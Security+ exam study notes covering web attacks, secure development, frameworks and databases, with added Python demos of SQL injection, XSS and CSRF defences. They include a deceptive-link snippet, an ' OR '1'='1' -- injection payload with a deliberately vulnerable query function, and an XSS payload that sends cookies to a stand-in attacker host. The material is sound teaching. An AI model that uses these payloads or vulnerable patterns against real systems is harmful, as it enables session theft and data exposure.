CompTIA Security+ 501 Summary Part 7
This is a summary of my notes on Chapter 7 of the CompTIA Security+ Get Certified Get Ahead by Darril Gibson, 5th Edition
Things to keep in mind:
- CompTIA is releasing an updated version of the Security+ Exam in November 2020 so this edition will soon be outdated. 90% of the book will remain the same in accordance with the updated exam. New threats and cloud-computing technology will probably make up the majority of that new 10% of content.
- Synthesizing paragraphs with a huge list of facts sometimes results in dreadful sentences. It also results in some streams of thought that end abruptly. Some notes cannot be digested any further and remain identical in this summary. In any case, these are just notes and not an essay.
- Some things are repeated but this is simply to reinforce.
- Hackers are referred to as actors.
2. Browser Attacks & Code Design Typo squatting is when an actor buys a domain name that looks very similar to a legitimate one (a common misspelling of it, for example) and uses it to trick users into thinking they are on the legitimate website. Clickjacking tricks users into clicking something other than what they think they're clicking; the classic form overlays a transparent iframe of the target site on top of a decoy page, so the victim's visible click lands on a hidden control. The simplest version of the same deception needs only HTML: a link whose visible text is a trusted address while the actual URL points somewhere else:
```html
<a href="https://maliciouswebsite[.]com">google.com</a>
```
3. Processes, Models, & Frameworks Error and exception handling protects the integrity of the operating system and controls the errors shown to users. Programmers should show users generic error messages but log detailed information (exception types, stack traces, query text) for themselves; detailed messages shown to users leak implementation details an actor can use. Static code analysis is the examination of code without running it. Dynamic analysis is the examination of code while it runs. Fuzzing is the technique of sending random or malformed data to an application to test for vulnerabilities and unhandled errors. Stress testing measures how much load an application can take; lots of popular games run stress tests to check server strength before multiplayer launches. Sandboxing is running an application within an isolated environment to test it. Model verification ensures that an application meets all of its specifications and fulfills its intended purpose.

Software Development Life Cycle, or SDLC, models provide structure. The Waterfall model, which preceded the Agile model, includes multiple stages where each stage feeds the stage below it in succession. It is very difficult to go back up a stage once it is complete, which is why it lacks flexibility. Agile has taken over the workplace because it uses iterative cycles that include the collaboration of all the necessary teams. Each cycle creates a working product that testers can verify. Developers then move to the next cycle to add or remove features depending on what the teams want. Secure DevOps is an agile-aligned development cycle that includes the input of security teams and their considerations.

Change management ensures developers do not make unauthorized changes, and version control tracks those changes with versions or enumerations of the software; the users who made each update are tracked as well. User accounts can be provisioned, created and added to the system environment, or deprovisioned, removed.
Provisioning an application refers to preparing and configuring that application, while deprovisioning an application refers to removing it from a system. Frameworks are structures that provide a foundation for IT personnel. Regulatory frameworks are based on laws and regulations; HIPAA is an example. Non-regulatory frameworks are based on common standards and best practices that organizations can choose to follow; COBIT is an example. An example of a national framework is the NIST Cybersecurity Framework, which focuses on cybersecurity activities and risks within the United States. An example of an international framework comes from ISO, the International Organization for Standardization (the ISO/IEC 27001 series, for instance). Industry-specific frameworks only apply to specific industries. For example, the Payment Card Industry Data Security Standard, PCI DSS, includes 12 requirements and over 220 sub-requirements that organizations processing credit card data must follow to protect that data.
4. Web Servers & Databases Web servers host websites on the Internet; Apache is the most popular web server software. A database is simply a structured set of data, and the individual elements within that structure are called fields. Normalization of a database is the organizing of tables and columns to reduce redundant data and improve the overall performance of that database. A First Normal Form, 1NF, database meets these three criteria: 1. each row within a table is unique and identified with a primary key; 2. related data is contained in a separate table; 3. none of the columns include repeating groups. Second Normal Form, 2NF, applies to tables with a composite primary key (two or more columns): the table is in 1NF and every non-key column depends on the whole composite key, not just part of it. A Third Normal Form, 3NF, database is in 2NF (which implies it is also in 1NF), and all columns other than the primary key depend directly on the primary key rather than on other non-primary-key attributes.

SQL injection is an attack where submitted data modifies an SQL query to reveal additional, unintended data (or to change it). The asterisk, *, is a wildcard in most contexts, including SQL, where it causes the database to return all columns in a table. The semicolon ends an SQL statement, and two dashes, --, start a comment that the database ignores to the end of the line. In an injection payload the two dashes are usually placed at the end to prevent a syntax error by commenting out the second single quote that the application appends to the submitted data. Parameterized queries (prepared statements or stored procedures), which treat user input strictly as data rather than as SQL, are the standard defense.

Cross-site Scripting, XSS, is when actors embed malicious HTML or JavaScript in a website's content, and that code then executes in the browser of another user who visits the page. Cross-site Request Forgery, XSRF or CSRF, is an attack where an actor tricks a user's browser into performing an action on a site where the user is already authenticated. An example would be a button on the actor's page whose code submits a purchase on a store where the user is logged in: the user thinks they are doing one thing, but the request behind the button makes them buy something.
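The SQL injection mechanics above (the closing quote, the always-true condition, the trailing -- that swallows the application's own quote) and the error-handling advice from section 3 (generic message to the user, detail to the log) are shown together in the following added Python example. It is not code from the book or from these notes; the users table, the sample rows and the function names are constructed for the demonstration. It uses only the standard library's sqlite3 and logging modules, so it runs offline.

```python
import logging
import sqlite3

# Constructed sample data for the demonstration (not from the original notes).
SAMPLE_USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]

# Detailed errors go to the log for developers; the user only ever sees GENERIC_ERROR.
logging.basicConfig(level=logging.ERROR)
log = logging.getLogger("auth")
GENERIC_ERROR = "Login failed. Please try again."


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Builds the query by string concatenation: the classic SQL injection flaw.

    Submitted data lands between two single quotes, so a payload that closes the
    first quote and comments out the second rewrites the query.
    """
    query = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterized query: the driver binds the value and never parses it as SQL."""
    query = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def login(conn: sqlite3.Connection, username: str, lookup=lookup_safe) -> str:
    """Generic message to the user; full detail (input, exception) to the log."""
    try:
        rows = lookup(conn, username)
    except sqlite3.Error as exc:
        log.error("lookup failed for %r: %s: %s", username, type(exc).__name__, exc)
        return GENERIC_ERROR
    if not rows:
        return GENERIC_ERROR
    return "Welcome, " + rows[0][0]


if __name__ == "__main__":
    conn = make_db()
    # ' OR '1'='1' --  closes the quote, adds an always-true condition, and the
    # -- comments out the trailing quote the application appends.
    payload = "' OR '1'='1' --"
    print(lookup_vulnerable(conn, payload))  # every row in the table
    print(lookup_safe(conn, payload))        # [] : no user has that literal name
    # A lone quote breaks the concatenated query. The raw exception would leak
    # the SQL text to the user; login() logs it and returns the generic message.
    print(login(conn, "'", lookup=lookup_vulnerable))
    print(login(conn, "alice"))
```

Python's sqlite3 driver refuses to run more than one statement per execute() call, so a stacked "; DROP TABLE users" payload fails here even against the vulnerable function; the same concatenation against a driver that accepts stacked statements would not be so lucky, which is why the fix is parameterization rather than relying on the driver.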
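For the XSS and CSRF paragraphs, the following added Python example (not from the book or the notes) shows the two defenses side by side: HTML output encoding, which turns an injected script element into inert text, and a CSRF token bound to the user's session that a forged cross-site request cannot supply. The session id, SERVER_KEY, the form dictionary and handle_post are all constructed for the demonstration; a real application would store a random per-session token server-side rather than deriving it with an HMAC as done here, and the defanged maliciouswebsite[.]com in the payload is a placeholder.

```python
import hashlib
import hmac
import html
import secrets

# Constructed for the example: a server-side secret used to derive CSRF tokens.
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Token bound to one session: HMAC-SHA256(SERVER_KEY, session_id).

    The attacker's page runs in a different origin and cannot read this value,
    so a forged request arrives without it.
    """
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_valid(session_id: str, token: str) -> bool:
    """Constant-time comparison against the token expected for THIS session."""
    return hmac.compare_digest(csrf_token(session_id), token)


def render_comment_vulnerable(comment: str) -> str:
    """Reflects user input straight into the page: stored/reflected XSS."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    """HTML-encodes the input so <script> becomes &lt;script&gt; text, not markup."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def handle_post(session_id: str, form: dict) -> str:
    """Simulated POST handler (constructed): reject requests without a valid
    token (CSRF), then render the comment with output encoding (XSS)."""
    if not csrf_valid(session_id, form.get("csrf_token", "")):
        return "403 Forbidden: missing or invalid CSRF token"
    return render_comment_safe(form.get("comment", ""))


if __name__ == "__main__":
    victim_session = "sess-1234"
    payload = (
        "<script>fetch('https://maliciouswebsite[.]com/?c=' + document.cookie)"
        "</script>"
    )
    print(render_comment_vulnerable(payload))  # script tag survives intact
    print(render_comment_safe(payload))        # rendered as harmless text
    # Forged cross-site request: the actor's page cannot read the victim's token.
    print(handle_post(victim_session, {"comment": "buy item", "csrf_token": "guess"}))
    # Legitimate submission from the application's own form, with the real token.
    print(handle_post(victim_session,
                      {"comment": payload, "csrf_token": csrf_token(victim_session)}))
```

Note that the two defenses are independent: the token check stops the store from acting on a request the user never meant to send, and the encoding stops a comment the user did send from executing in other visitors' browsers.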